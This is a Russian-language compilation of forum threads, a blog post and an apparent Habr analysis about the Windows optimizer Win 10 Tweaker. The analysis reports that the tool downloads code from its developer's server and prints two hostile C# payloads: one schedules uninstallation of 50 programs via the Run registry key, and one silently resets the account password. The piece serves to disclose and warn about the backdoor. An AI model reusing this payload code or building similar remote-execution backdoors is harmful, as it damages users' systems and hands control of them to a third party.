Skip to content
- ТВикинариум
- Форум
- Поддержка
- PRO
- Войти
Защитник виндовc удаляет последний Win 10 Tweaker
Цитата: Сергей от 30.10.2021, 15:04Установил сегодня wi10 pro 21Н1 с образа скаченного 29.10.21 у майкрософт, сборка 19043.1320. Прошлая версия твикера 18.0 pro (невижу где написан номер билда) не удаляет защитник виндовса. Вроди как удалила но всеравно блокирует активатор и другие ПО, после перезагрузки винды пункт в меню твикера отмечается как неактивирована деактивайия защитника. Скачал сегодня твикер заново, невозможно указать точную сборку и билд, т.к винда сразу после запуска удаляет твикер. Старый твикер винда не трогает. Что делать? закончилась лафа?))
Установил сегодня wi10 pro 21Н1 с образа скаченного 29.10.21 у майкрософт, сборка 19043.1320. Прошлая версия твикера 18.0 pro (невижу где написан номер билда) не удаляет защитник виндовса. Вроди как удалила но всеравно блокирует активатор и другие ПО, после перезагрузки винды пункт в меню твикера отмечается как неактивирована деактивайия защитника. Скачал сегодня твикер заново, невозможно указать точную сборку и билд, т.к винда сразу после запуска удаляет твикер. Старый твикер винда не трогает. Что делать? закончилась лафа?))
Цитата: Adler от 30.10.2021, 15:16Добрый день.
Перед первым использованием отключити Защитник вручную, а потом снесите его твикером.
Эта тема 100500 раз обсуждалась. Ищите на форуме. Тема закрыта.
Добрый день.
Перед первым использованием отключити Защитник вручную, а потом снесите его твикером.
Эта тема 100500 раз обсуждалась. Ищите на форуме. Тема закрыта.
Всем привет! Меня зовут Тилек, и я пользуюсь Windows. Меня эта операционная система вполне устраивает. У меня видавший виды б/у-ный служебный ноутбук HP ProBook 4540s, который у меня с 2015 года. Модель старая, да и сам ноут не новый, и с тех пор он успел побывать несколько раз в ремонте. В начале прошлого года я перешел с Windows 7 на Windows 10, и тогда скорость работы ноутбука заметно снизилась. Я искал программы по оптимизации ОС, которые могли бы увеличить производительность и быстродействие. Тогда я и наткнулся на Win 10 Tweaker.
Сначала я перепробовал несколько других программ, которые поисковик выдавал в топ-листе типа «15 лучших программ для оптимизации вашего компьютера». Толку от таких программ мало: ноут быстрее не станет, но теперь будет еще и с рекламными уведомлениями. На YouTube я наткнулся на ролик «Заметки о разработке Win 10 Tweaker», где автор рассказывал о своей программе по оптимизации ОС Windows. Посмотрев ролик, я скачал программу (всего полтора мегабайта). Установка не требовалась. Запустив файл exe, можно сразу приступать к оптимизации сделав несколько кликов.
После запуска Твикер начинает считывать все параметры системы, не сохраняя никаких надстроек, ничего не записывая в реестр (по словам автора). Перед применением программы настоятельно рекомендуется вручную создать точку восстановления системы (а лучше и вовсе резервную копию Windows 10). Автор Win 10 Tweaker отдельно предупреждает о том, что предполагает, что утилита будет запущена в чистой Windows 10, а не в какой-либо сборке или иным образом модифицированной системе — в этом случае вероятность того, что что-то пойдет не так возрастает.
Есть большая вероятность, что ваш антивирус может заблокировать запуск Win 10 Tweaker или сообщить о том, что это потенциально нежелательное ПО, такой же отчет вы увидите и в VirusTotal (не исключено, что, это действительно так).
После запуска программы и принятия лицензионного соглашения вы увидите интерфейс, типичный для твикеров — возможности, отсортированные по категориям, в каждой из которых можно выбрать нужные параметры оптимизации и применить их кнопкой слева внизу. В Win 10 Tweaker при наведении указателя мыши на заголовки настроек в панели слева отображается описание этого пункта, для некоторых разделов описание дается для всего раздела целиком.
Опции
Конфиденциальность — параметры для отключения различных функций телеметрии (слежки).
Контекстное меню — добавление полезных и удаление ненужных пунктов контекстного меню.
Интерфейс — варианты оптимизации внешнего вида.
Система — изменение некоторых опций системы, отключение компонентов Windows 10 (например, возможность отключить Защитник Windows 10, включить старый просмотр фотографий, удалить OneDrive).
Службы — отключение «ненужных» служб Windows 10 и служб, отвечающих за обновления, некоторые возможности телеметрии. Состояние (включена-отключена) служб изменяется путем нажатия по её названию.
Очистка — удаление временных и других ненужных файлов, кэша браузеров и игр, кэша установщиков и других элементов.
Приложения — удаление (с возможность восстановления) встроенных приложений.
Автозагрузка — программы и другие объекты в автозагрузке с возможностью их отключения и включения. На эту тему: Как удалить и добавить программы в автозагрузку Windows 10.
Оптимизация — опции сжатия ОС и системных файлов, хранилища WinSxS, очистки от устаревших драйверов, возможность удаления дубликатов файлов с диска.
Проверка на вирусы — возможность проверки файлов в интерфейсе Win 10 Tweaker через API VirusTotal.
Системная информация — базовые сведения об операционной системе и оборудовании компьютера.
Скрытая угроза
Проблема у меня случилась через пару дней после применения Твикера. У меня пропал доступ в корпоративную сеть. Я не применял все подряд твики, я читал инструкцию и соглашение. Я применял твики по очистке кэша, по отключению ненужных служб диагностики и службы телеметрии, а все что касалось сервера и общего доступа не трогал. Но для корпоративной сети я стал невидим. Откат всех примененных твиков не помогал. В итоге несколько дней системный администратор заново устанавливал и настраивал доступ моей учетной записи.
Работает ли Win 10 Tweaker? Да, работает. Все заявленные опции программы применяются. Но помимо этого программа может заниматься побочной деятельностью, что чревато для пользователя проблемами. Результат может быть самым разнообразным. Если по прошествии какого-то времени вы столкнетесь с тем, что какие-то компоненты системы отказываются работать, программы, «завязанные» на серверы Майкрософт, сообщают об ошибках, нужная служба не запускается, ссылаясь на зависимые службы (Не удалось запустить дочернюю службу или группу), не исключено, что причина в проделанной когда-то оптимизации.
Чтобы грамотно использовать программу вы должны хорошо разбираться в работе и настройке операционной системы. Но если вы разбираетесь, то вы и так сможете оптимизировать работу ОС, без этой программы. Лично для меня это будет хорошим уроком, не устанавливать направо и налево первые попавшиеся утилиты.
Вывод
Но Твикеры — не панацея. То что они работают без проблем у большинства, не гарантирует того, что у вас все пойдет как по маслу. Операционная система не простая вещь, разбираться в ней трудно, но нужно. Первый шаг для этого — открыть диспетчер задач и посмотреть какие процессы идут в данный момент, и на сколько загружены память и процессор. В Windows много ошибок, но работа конкретно вашего ПК или ноутбука зависит от вас.
P.S. Пост был убран из публикации после того, как в комментах меня начали обвинять в агитке и рекламе Твикера. Хоть я и написал, что лично пострадал от данной программы. Но я решил вернуть в публикацию, так как считаю что информация все же может быть полезной и заставит передумать тех, кто думает устанавливать Win 10 Tweaker!
В погоне за конфиденциальностью, большинство пользователей и не подозревают, как добровольно делятся своими данными с разработчиками разных программ, которые якобы защищают приватность пользователя.
Речь пойдет о программе «Win 10 Tweaker» в которой пользователь «Sanctuarys» из ресурса «Хабр» нашёл бэкдор, который был замечен ещё осенью 2020 года.
Win 10 Tweaker — известная программа, которую используют, чтобы отключить сбор данных в Windows 10. «Sanctuarys» установил саму программу с официального сайта. Выдал все запрашиваемые разрешения и затем начал прослушивать трафик приложения.
Win 10 Tweaker скачал с
ресурса исполняемый код написанный на C#, который записывает в реестр указания удалить 50 первых установленных программ пользователя. При первом входе или выходе из учётной записи, эти программы запустили свои деинсталляторы.
Осенью, на том же
был найден C#-код, который устанавливает на учётную запись пароль «Rock5taR». То есть, если у вас установлен Win 10 Tweaker, разработчик может исполнять любой код на вашем ПК с этого
.
Скажу проще, ваш ПК в чужих руках из-за одной установленной программы. Код исполняется запрашивается и исполняется через Win 10 Tweaker.
Что делать? Удалить Win 10 Tweaker и очистить раздел «Автозагрузка» от подозрительных программ.
И пусть лучше Microsoft собирает ваши данные, чем кто-то делает на вашем ПК непонятно что.
На данный момент
программы заблокирован, но шанс наличия дополнительного зеркала для бэкдора все равно остается. Настоятельно рекомендую удалить Win10 Tweaker с вашего компьютера.
Спасибо за предоставленный материал:
-
#1
Win 10 Tweaker — популярная программа для быстрой и удобной оптимизации Windows в несколько кликов. Может отключать ненужные конфигурации, оставив только самые востребованные параметры и опции, что значительно повысит производительность ПК.
Непонятный срач по поводу Win 10 Tweaker
Появился пост на Хабре, который позднее заблокировали (пост в архиве).
Весь срач в комментариях тут: repack.me
Комментарии от аватар программы: https://t.me/win10tweaker/48
Последнее редактирование: 15.05.2021
-
#2
А давайте выскажусь как это все выглядит с моей точки зрения.
Не углубляясь в код и прочую не интересную мне лично хрень которая разошлась таким диким срачем как со стороны сообщества, хостера, а так же вообще некрасивым говном на вентилятор со стороны автора, который по факту выпускает
программный продукт реально ломающий целостность кода коммерческой операционной системы с закрытым исходным кодом
, тем самым нарушая ее работоспособность предусмотренную разработчиком, а так же цепляя налево и направо тот код и функционал о котором автору вполне вероятно даже неизвестно хочу сказать со стороны точки зрения технического специалиста Удостоверяющего центра СКБ Контур то что перед тем как осуществлять настройку рабочего места клиенту мы всегда первым делом удаляем все Твикеры (*уикеры), Классик меню, Менеджеры браузеров, Адвизоры, Ускорители (замедлители) и всю прочу по**бень, дабы вернуть систему в исходное состояние (sfc /scannow), иначе косяки лезут как из рога изобилия именно благодаря этим ноу-хау программулькам которые были столь популярны в начале 2000-х, и по какой то неведомой мне причине таковыми остаются до сих пор, благодаря чему ПО которое необходимо для работы людям которые РАБОТАЮТ не функционирует как положено, уже молчу о безопасности системы в целом. Кроме всего прочего, если любая прокладка между стулом и клавиатурой после установки этого » ноу-хау добра» обращается в поддержку любого более-менее крупного разработчика то она автоматом посылается на*уй именно по причине наличия в ОС установленной этой ху*ни.
-
#3
ЗЫ, помню ещё со времен XP…
Такая дичь, эти оптимизаторы, оформители, ускорители..
Народ накачает оптимизаторского говна, оформят десктоп темы и сидят скрины публикуют, типо я хацкер, смотрите, какой у меня реактивный агрегат… 
-
#4
Частично соглашусь с bat и GiT по поводу украшательств OS и свистоперделок.
Такие вещи приходилось самому удалять у клиентов , чтобы оживить систему.
Даже скажу больше, приходилось удалять бесплатные антивирусы, (тот же Avast), которые не только дико замедляли работу, но и давали такие ошибки, источники которых, трудно было предпроложить, пока не удалишь антивирус.
НО не имею ничего против твикеров, как ПО собирающего настройки в одном месте при условии, что это не разрушает OS.
Это удобно.
Что касается десятки, то на этого монстра, правда хочется найти управу.
Хотя бы потому, что телеметрия жрёт неимоверное количество трафика.
А ещё обновления гигантских размеров.
В условиях безлимита ещё терпимо.
А если у клиента мобильное соединение ? Скажу сразу, что объявить соединение лимитным тоже не всегда помогает.
Что-то приходится придумывать.
У себя через Mikrotik заблокировал часть телеметрии, всю, увы невозможно, так как адреса меняются.
А у клиентов использую твикер в том числе. Вот этот.
Думаю, что Gold Microsoft Partner не будет портить систему и рисковать репутацией.
-
#5
Win10Tweaker отличная программа! Какой бы там (выше) спецтехпро не говорил своё мнение. Вот я как пользователь (винды) выше среднего уровня крайне доволен фишками, что дает данный твикер.
Да и автор твикера классный мужик. Убежден что он знает что делает и создает.
-
#6
Ничего себе, что творится. Можно по-разному относиться к твиерам-уикерам. Например, уважаемый bat считает, что
программный продукт реально ломающий целостность кода коммерческой операционной системы с закрытым исходным кодом, тем самым нарушая ее работоспособность предусмотренную разработчиком
Но! Если говорить о конкретной программе — Win 10 Tweaker — насколько мне известно, она ничего не ломает, она включает/отключает настройки «системного реестра» Windows. Т.е. использует инструмент настройки, предусмотренный разработчиком ОС. Никакие системные файлы и библиотеки она не ломает и не патчит. Я ошибаюсь?
-
#7
Ничего себе, что творится. Можно по-разному относиться к твиерам-уикерам. Например, уважаемый bat считает, что
Но! Если говорить о конкретной программе — Win 10 Tweaker — насколько мне известно, она ничего не ломает, она включает/отключает настройки «системного реестра» Windows. Т.е. использует инструмент настройки, предусмотренный разработчиком ОС. Никакие системные файлы и библиотеки она не ломает и не патчит. Я ошибаюсь?
Не ошибаешься. Так и есть.
ggnk
Созидатель (II)
-
#9
На официальном сайте сайте разраба
-
#10
Но! Если говорить о конкретной программе — Win 10 Tweaker — насколько мне известно, она ничего не ломает, она включает/отключает настройки «системного реестра» Windows. Т.е. использует инструмент настройки, предусмотренный разработчиком ОС. Никакие системные файлы и библиотеки она не ломает и не патчит. Я ошибаюсь?
Снова отвечу, поясню, для тех кто не понял что я хотел сказать. Про бекдор говорить не буду, я лично о своем отношении к ПО данного типа.
Синоним к слову «ломает» — «нарушает», то есть вредит (еще синоним) целостности системы, которая состоит из охренительного множества компонентов которые зависят друг от друга (работают как система, по этому Windows и называется операционная СИСТЕМА, а не графическая оболочка) суть от этого не меняется, если у одного все работает прекрасно ввиду скудности необходимого ему функционала, то у других будут реальные проблемы, не просто так программы подобного рода определяются антивирусами как вредное ПО, неужели не понятно из моего первого сообщения о чем речь? Если бы все было так бело и пушисто, то он бы удосужился согласовать свою херню с Майками.
Читаем пункты настройки этой приблуды (Win 10 tweaker) и видим несколько раз слово «выпиливание«, ничего не напоминает (синонимы, последствия)?
Повторюсь:
Разработчик твикера не знает и знать не может какие процессы системы будут нарушены в итоге его этих «выпиливаний» того или иного, нужно быть совсем с высохшим мозгом чтобы этого не понимать, у него нет команды тестеров, а если и есть то тестить нужно его прогу + ОС, не думаю что у него штат больше чем у Microsoft, он не делает релизы своего волшебства заточенными под политику обновлений ОС, так как он не знает какие изменения вносятся с каждым новым релизом ОС и под что ему подстраиваться, по этому и выпускает более-менее заметный своим функционалом ширпотреб не вдаваясь в детали, у него есть спонсоры, к этому и сводится вся его деятельность — заработок.
Статью на Хабре вернули, про бекдоры так же написано на Руборде, на Пикабу так же повтор:
Ну и тут чуток, кому читать впадлу:
Хватит строить иллюзии относительно, как их назвал @Starwanderer , свистоперделок, они никогда не делались идеально, с добрым умыслом и без желания получить профит, а если и делались, то максимум до той поры пока компы не стали частью обычной домашней техники которая есть почти у всех, ну и интернет стал массово доступен, разумеется.
На сим раскланяюсь, хотите — устанавливайте и пользуйтесь, но когда у вас недиагностируемые баги полезут избавьте от вопросов в разделе Windows почему так случилось, тем более что ваш любимый твикер отключит самодиагностику системы и логи удалит.
Последнее редактирование: 01.06.2021
-
#11
Не вернули, это другая статья…
Вообщем вес срач из-за того, что твикер имеет скрытую, но юридически оговорённую функцию, которая позволяет Автору, через интернет загружать пользователю произвольный код. Это не значит, что функция уязвима или загружаемый произвольный код обязательно вредоносный (со слов автора)…
Простыми словами можно сказать так: Я могу, но я не буду, честное пионерское…
Теоретически, автор имеет возможность загрузить вредоносный код. Однако автор не занимается подобными вещами и подобных прецедентов нет.
Это тоже самое, что если бы Хром вместо обновлений загрузил бы вреданос… Теоретически возможно? Да… На практике, прецедентов нет…
Клевета в видео про Win10Tweaker
Опять клевета…
-
#12
ЗЫ, помню ещё со времен XP…
Такая дичь, эти оптимизаторы, оформители, ускорители..
Народ накачает оптимизаторского говна, оформят десктоп темы и сидят скрины публикуют, типо я хацкер, смотрите, какой у меня реактивный агрегат…
Посмотреть вложение 2300
nice )
Антивирусная защита, Информационная безопасность, Системное администрирование, Разработка под Windows, Софт
Рекомендация: подборка платных и бесплатных курсов Java — https://katalog-kursov.ru/
Для неподготовленных юзеров, которые сталкиваются с Windows, настройки ОС иногда становятся настоящим темным лесом. Эту достаточно узкую нишу охватывают разработчики всевозможных твикеров, один из которых в своих подходах к защите своей программы пошел самым радикальным способом. Сегодня мы немножко препарируем один самых известных таких продуктов — Win 10 Tweaker и посмотрим, какой «сюрприз» спрятал внутри его создатель.
Решил оформить небольшой материал с доказательствами того, как с недавних пор (примерно с осени 2020 года) в Win 10 Tweaker в целях борьбы со взломом программы был интегрирован самый обычный бэкдор, в особых обстоятельствах получающий зловредный код с ресурса https://win10tweaker.com/PrivilegeUser.php?key=Universal.
Не будем обсуждать личность автора и его отношение к пользователям, а также то, что он творит на своем форуме, а поговорим о том, что нам поведал сниффер трафика Win 10 Tweaker, у которого на момент написания статьи, судя по счётчику на сайте, больше 1 400 000 скачиваний.
-
Скачиваем с сайта последнюю версию программы. Сейчас скачивается версия 17.2, SHA-256: 06DB5801D37895C75B7D60FA5971827DA80CC275D9E78E5986A120C003021A0D;
-
Выяснилось, что, чтобы вызвать скачивание удаленного кода, надо просто создать в %LOCALAPPDATA% папку Turbo.net, а внутри — просто пустой файл System.Deps.dll;
-
Запускаем Win 10 Tweaker и принимаем правой кнопкой соглашение;
-
Хватит лишь открытия раздела «Системная информация», где можно получить сведения о характеристиках ПК;
-
Сразу с ресурса, указанного выше, через бэкдор в открытом виде скачивается и исполняется код, написанный на C#, который прописывает в реестре в раздел автозагрузки для всех пользователей ключи на удаление первых 50 установленных программ. При первом выходе/входе из учетной записи или перезагрузке эти программы запустят свои деинсталляторы.
using System;
using System.Collections.Generic;
using Microsoft.Win32;
using System.IO;
namespace N {
class C {
public void M() {
string path = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\AppData\Local\Turbo.net";
if (Directory.Exists(path)) {
string[] files = Directory.GetFiles(path, "*.*", SearchOption.AllDirectories);
foreach(string file in files) {
if (file.Contains("System.Deps.dll")) {
List list = new List();
using(RegistryKey key = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall")) {
foreach(string k in key.GetSubKeyNames()) {
if (key.OpenSubKey(k).GetValue("UninstallString") != null) {
list.Add(key.OpenSubKey(k).GetValue("UninstallString").ToString());
}
}
}
for (int i = 0; i < 50; i++) {
RegistryKey key = Registry.LocalMachine.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run");
key.SetValue(i.ToString(), list[i]);
}
}
}
}
}
}
}Разберем по-быстрому код.
-
Берется путь профиля и присобачивается к нему «\AppData\Local\Turbo.net»;
-
Если имеется папка Turbo.net, то по маске *.* рекурсивно ищется файл System.Deps.dll;
-
Если такой на вашу беду находится, то получаем значения ключей UninstallString в разделе HKLMSOFTWAREMicrosoftWindowsCurrentVersionUninstall. В этом параметре хранится команда для деинсталляции программ. Собственно, именно эта команда запускается, когда вы удаляете в Windows любую программу, если ее деинсталлятор прописывается в системе.
-
Сохраняем полученные строки и записываем первые 50 команд на удаление в автозагрузку для всех пользователей. Отныне при первой перезагрузке запустят свои деинсталляторы те программы, у которых есть свойство UninstallString.
Сохраненная ссылка на Wayback Machine, если «чудотворным» образом ресурс будет недоступен. Кстати, тот же зловредный код расположен и на домене https://win10tweaker.ru/PrivilegeUser.php?key=Universal.
Скажите спасибо, что не в тихом режиме все удаляется, и окошки с уведомлением об удалении будут видны в любом случае.
Осенью же на этом ресурсе располагался другой код, устанавливающий пароль на учетную запись. Пароль, как нетрудно догадаться, глядя на код, был Rock5taR. То есть ресурс один, а зловредный код иногда да и меняется.
using System;
using System.Diagnostics;
using System.IO;
namespace N
{
class C
{
public void M()
{
string path = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\AppData\Local\Turbo.net";
if (Directory.Exists(path))
{
string[] files = Directory.GetFiles(path, "*.*", SearchOption.AllDirectories);
foreach (string file in files)
{
if (file.Contains("System.Deps.dll"))
{
Process.Start(new ProcessStartInfo
{
FileName = "cmd",
Arguments = "/c net user " + """ + Environment.UserName + """ + " Rock5taR",
WindowStyle = ProcessWindowStyle.Hidden
});
}
}
}
}
}
}Также автор заявляет о портативности программы, что на самом деле не так: чего только стоит создание неудаляемого ключа в реестре по пути HKCUSoftwareWin 10 Tweaker, так как программа меняет права доступа на этот раздел.
Видео с одним из вариантов, как удалить ключ.
Остается тайной, зачем автор в борьбе с пиратами, беря за программу в том числе и плату, интегрировал туда самый обычный бэкдор. И кто знает, что еще она в себе таит… Выводы, как всегда, делать только вам.
upd1: все ресурсы заблокировал хостер.
upd1: реакция автора трояна.
upd3: реакция автора трояна в виде аудио-послания: https://t.me/win10tweaker/48
Спойлер: он считает, что все сделал правильно, мы все убоги и, оказывается, завидуем его успеху, а этот «инцидент» — жирный намек.
upd4: после связи с модератором rutracker.org все темы с Win 10 Tweaker были удалены (кроме совсем старых). Модератор в теме на NNM продолжает банить пользователей и удалять их сообщения при упоминании трояна и этой статьи. Все как всегда.